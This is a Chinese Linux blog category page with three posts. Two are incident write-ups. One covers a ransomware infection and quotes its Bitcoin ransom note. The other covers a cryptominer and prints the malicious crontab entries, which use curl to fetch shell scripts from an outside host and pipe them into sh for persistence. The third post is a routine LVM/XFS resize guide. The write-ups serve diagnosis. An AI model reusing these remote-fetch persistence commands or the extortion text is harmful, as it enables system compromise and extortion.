标签云
asm mount asm恢复 asm 恢复 bbed bootstrap$ dul In Memory kcbzib_kcrsds_1 kccpb_sanity_check_2 kfed MySQL恢复 ORA-00312 ORA-00607 ORA-00704 ORA-01110 ORA-01555 ORA-01578 ORA-08103 ORA-600 2662 ORA-600 3020 ORA-600 4000 ORA-600 4137 ORA-600 4193 ORA-600 4194 ORA-600 16703 ORA-600 kcbzib_kcrsds_1 ORA-15042 ORA-15196 ORACLE 12C oracle dul ORACLE PATCH Oracle Recovery Tools oracle加密恢复 oracle勒索 oracle勒索恢复 oracle异常恢复 Oracle 恢复 ORACLE恢复 ORACLE数据库恢复 oracle 比特币 OSD-04016 YOUR FILES ARE ENCRYPTED 勒索恢复 比特币 oracle 比特币加密文章分类
- Others (2)
- 中间件 (2)
- WebLogic (2)
- 操作系统 (93)
- 数据库 (1,481)
- DB2 (22)
- MySQL (63)
- Oracle (1,358)
- Data Guard (42)
- EXADATA (7)
- GoldenGate (21)
- ORA-xxxxx (153)
- ORACLE 12C (72)
- ORACLE 18C (6)
- ORACLE 19C (12)
- ORACLE 21C (3)
- Oracle ASM (62)
- Oracle Bug (7)
- Oracle RAC (43)
- Oracle 安全 (6)
- Oracle 开发 (26)
- Oracle 监听 (26)
- Oracle备份恢复 (471)
- Oracle安装升级 (74)
- Oracle性能优化 (62)
- 专题索引 (5)
- 勒索恢复 (68)
- PostgreSQL (13)
- PostgreSQL恢复 (3)
- SQL Server (27)
- SQL Server恢复 (8)
- TimesTen (7)
- 达梦数据库 (2)
- 生活娱乐 (2)
- 至理名言 (11)
- 虚拟化 (2)
- VMware (2)
- 软件开发 (32)
- Asp.Net (9)
- JavaScript (12)
- PHP (2)
- 小工具 (15)
-
最近发表
- ORA-600 kcbzpbuf_1故障恢复
- Oracle 19c 断电异常恢复
- Oracle Recovery Tools快速恢复ORA-19909
- IMP-00009: abnormal end of export file
- truncate sys用户表导致数据库异常恢复
- MySQL 8.0版本ibd文件恢复
- linux系统文件加密勒索病毒
- RAC节点时间间隔过大导致执行root.sh不成功
- 数据库附加失败 错误5172
- ORA-00742: 日志读取在线程 %d 序列 %d 块 %d 中检测到写入丢失情况
- MyISAM表delete记录恢复
- OGG-01777 Extract abended as it ran out of sequence numbers used to create TRAIL files
- ORA-00800: soft external error, arguments: [Set Priority Failed]
- 被.mallox数据库恢复
- ora-600 kccpb_sanity_check_2故障处理
- ORA-600 3417和ORA-600 3005故障处理
- ORA-12547: TNS:lost contact故障一例
- rac kill 大事物后回滚慢,smon等待DFS lock handle和enq: TX – contention
- 最近两种加密oracle数据库文件勒索病毒可以实现直接open数据库恢复
- open只有system文件的库
友情链接
分类目录归档:Linux
linux系统文件加密勒索病毒
昨天晚上,一客户联系我们,其linux的dg备库上发现病毒,让我给看看,登录上去之后发现异常进程
进一步检查发现很多文件被加密成.locked1

对应的README.html内容
[yyapp@ncapp ~]$ cat README1.html contact email: service@hellowinter.online, prepare 0.12btc, if you can't contact my email, please contact some data recovery company(suggest taobao.com), may they can contact to me . your person id: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 ZfbR1XwXHXlqcyIJJzubxAucYrSaSG6M [yyapp@ncapp ~]
通过以上信息基本上确认一种类似win的加密勒索病毒,经过分区确认只是加密了yyapp用户有读写权限的数据,其他数据用户数据没有被加密(这个机器是应用服务器,并且做了oracle的备库[没有被加密]),因此基于目前的情况对客户没有太大损失,直接重装应用配置dg即可.通过进一步分区,确认该病毒是通过应用漏洞入侵,建议客户进行应用和系统安全加固.
温馨提示:以前的勒索病毒绝大部分都集中在win平台上,现在可能linux平台也会收到很大影响,建议各位对各自系统进行安全加固,系统和应用打上漏洞补丁和网络安全防护
发表在 Linux
评论关闭
记录一种挖矿病毒现象
最近有朋友遇到linux系统不行被注入了挖矿病毒,大概记录下存在问题
在/etc/passwd文件中有x用户
x:x:2001:2001::/home/x:/bin/bash
在root和x用户的crontab中有恶意执行任务
[root@localhost tmp]# crontab -u x -l * * * * * /var/tmp/.systemd/.systemd * * * * * /var/tmp/.update/.update */10 * * * * curl -fsSL http://pw.pwndns.pw/update.sh | sh -s uc @reboot curl -fsSL http://pw.pwndns.pw/reboot.sh | sh [root@localhost tmp]# crontab -l * * * * * /var/tmp/.systemd/.systemd */5 * * * * curl -fsSL http://pw.pwndns.pw/root.sh | sh
在/var/tmp下面有.systemd和.update文件夹
[root@localhost tmp]# ls -lart /var/tmp/ drwxr-xr-x 2 x tape 37 Jul 27 21:49 .systemd drwxr-xr-x 2 x tape 36 Jul 27 21:49 .update
lvm缩小xfs文件系统空间和对swap进行扩容操作
xfs文件系统lvm缩小空间操作(/home从100G减小到80G)
[root@xifenfei ~]# df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/rhel-root 449G 6.0G 443G 2% / devtmpfs 63G 0 63G 0% /dev tmpfs 63G 0 63G 0% /dev/shm tmpfs 63G 20M 63G 1% /run tmpfs 63G 0 63G 0% /sys/fs/cgroup /dev/mapper/rhel-home 100G 38M 100G 1% /home /dev/sda2 1014M 165M 850M 17% /boot /dev/sda1 200M 9.8M 191M 5% /boot/efi tmpfs 13G 4.0K 13G 1% /run/user/42 tmpfs 13G 32K 13G 1% /run/user/0 /dev/sr0 4.2G 4.2G 0 100% /media [root@xifenfei u01]# xfsdump -f /home.xfsdump /home xfsdump: using file dump (drive_simple) strategy xfsdump: version 3.1.7 (dump format 3.0) - type ^C for status and control ============================= dump label dialog ============================== please enter label for this dump session (timeout in 300 sec) -> home session label entered: "tar czvf /home.tar.gz /home home" --------------------------------- end dialog --------------------------------- xfsdump: level 0 dump of xifenfei:/home xfsdump: dump date: Fri Jun 25 11:37:13 2021 xfsdump: session id: 4d75008e-9927-417d-9722-52d13bb89eb0 xfsdump: session label: xfsdump: ino map phase 1: constructing initial dump list xfsdump: ino map phase 2: skipping (no pruning necessary) xfsdump: ino map phase 3: skipping (only one dump stream) xfsdump: ino map construction complete xfsdump: estimated dump size: 4828224 bytes xfsdump: /var/lib/xfsdump/inventory created ============================= media label dialog ============================= please enter label for media in drive 0 (timeout in 300 sec) -> home media label entered: "home" --------------------------------- end dialog --------------------------------- xfsdump: creating dump session media file 0 (media 0, file 0) xfsdump: dumping ino map xfsdump: dumping directories xfsdump: dumping non-directory files xfsdump: ending media file xfsdump: media file size 4732672 bytes xfsdump: dump size (non-dir files) : 4588480 bytes xfsdump: dump complete: 4 seconds elapsed xfsdump: Dump Summary: xfsdump: stream 0 /home.xfsdump OK (success) xfsdump: Dump Status: SUCCESS [root@xifenfei u01]# umount /home [root@xifenfei u01]# lvreduce -L 80G /dev/mapper/rhel-home WARNING: Reducing active logical volume to 80.00 GiB. THIS MAY DESTROY YOUR DATA (filesystem etc.) Do you really want to reduce rhel/home? [y/n]: y Size of logical volume rhel/home changed from 100.00 GiB (25600 extents) to 80.00 GiB (20480 extents). Logical volume rhel/home successfully resized. [root@xifenfei u01]# mkfs.xfs -f /dev/mapper/rhel-home meta-data=/dev/mapper/rhel-home isize=512 agcount=16, agsize=1310720 blks = sectsz=512 attr=2, projid32bit=1 = crc=1 finobt=0, sparse=0 data = bsize=4096 blocks=20971520, imaxpct=25 = sunit=64 swidth=64 blks naming =version 2 bsize=4096 ascii-ci=0 ftype=1 log =internal log bsize=4096 blocks=10240, version=2 = sectsz=512 sunit=64 blks, lazy-count=1 realtime =none extsz=4096 blocks=0, rtextents=0 [root@xifenfei u01]# mount /home xfsrestore -f /home.xfsdump /home [root@xifenfei u01]# xfsrestore -f /home.xfsdump /home xfsrestore: using file dump (drive_simple) strategy xfsrestore: version 3.1.7 (dump format 3.0) - type ^C for status and control xfsrestore: searching media for dump xfsrestore: examining media file 0 xfsrestore: dump description: xfsrestore: hostname: xifenfei xfsrestore: mount point: /home xfsrestore: volume: /dev/mapper/rhel-home xfsrestore: session time: Fri Jun 25 11:37:13 2021 xfsrestore: level: 0 xfsrestore: session label: "tar czvf /home.tar.gz /home home" xfsrestore: media label: "home" xfsrestore: file system id: b996cff9-332b-4c07-96e1-8335a1f23627 xfsrestore: session id: 4d75008e-9927-417d-9722-52d13bb89eb0 xfsrestore: media id: 6094b9b5-a45f-4638-a0e2-c1b982ead67b xfsrestore: using online session inventory xfsrestore: searching media for directory dump xfsrestore: reading directories xfsrestore: 119 directories and 188 entries processed xfsrestore: directory post-processing xfsrestore: restoring non-directory files xfsrestore: restore complete: 0 seconds elapsed xfsrestore: Restore Summary: xfsrestore: stream 0 /home.xfsdump OK (success) xfsrestore: Restore Status: SUCCESS [root@xifenfei u01]# df -h Filesystem Size Used Avail Use% Mounted on /dev/mapper/rhel-root 449G 14G 435G 4% / devtmpfs 63G 0 63G 0% /dev tmpfs 63G 20M 63G 1% /run tmpfs 63G 0 63G 0% /sys/fs/cgroup /dev/sda2 1014M 165M 850M 17% /boot /dev/sda1 200M 9.8M 191M 5% /boot/efi tmpfs 13G 4.0K 13G 1% /run/user/42 tmpfs 13G 28K 13G 1% /run/user/0 /dev/sr0 4.2G 4.2G 0 100% /media tmpfs 63G 0 63G 0% /dev/shm /dev/mapper/rhel-home 80G 38M 80G 1% /home
xfs系统的lvm无法直接缩小空间,只能是通过xfsdump /home内容,然后lvm缩小空间重做xfs文件系统,再使用xfsdump还原
lvm扩容swap空间(swap从8G扩大到16G)
[root@xifenfei home]# free -m total used free shared buff/cache available Mem: 128355 86907 26110 274 15338 37632 Swap: 8192 0 8192 [root@xifenfei home]# lvextend -L 16GB /dev/rhel/swap Size of logical volume rhel/swap changed from 8.00 GiB (2048 extents) to 16.00 GiB (4096 extents). Logical volume rhel/swap successfully resized. [root@xifenfei home]# sync;sync [root@xifenfei home]# swapoff /dev/rhel/swap mkswap /dev/rhel/swap [root@xifenfei home]# mkswap /dev/rhel/swap mkswap: /dev/rhel/swap: warning: wiping old swap signature. swapon /dev/rhel/swap Setting up swapspace version 1, size = 16777212 KiB no label, UUID=8d79ccf4-1796-49c9-968d-23abb67bc6eb [root@xifenfei home]# swapon /dev/rhel/swap [root@xifenfei home]# free -m total used free shared buff/cache available Mem: 128355 86907 26110 274 15338 37632 Swap: 16383 0 16383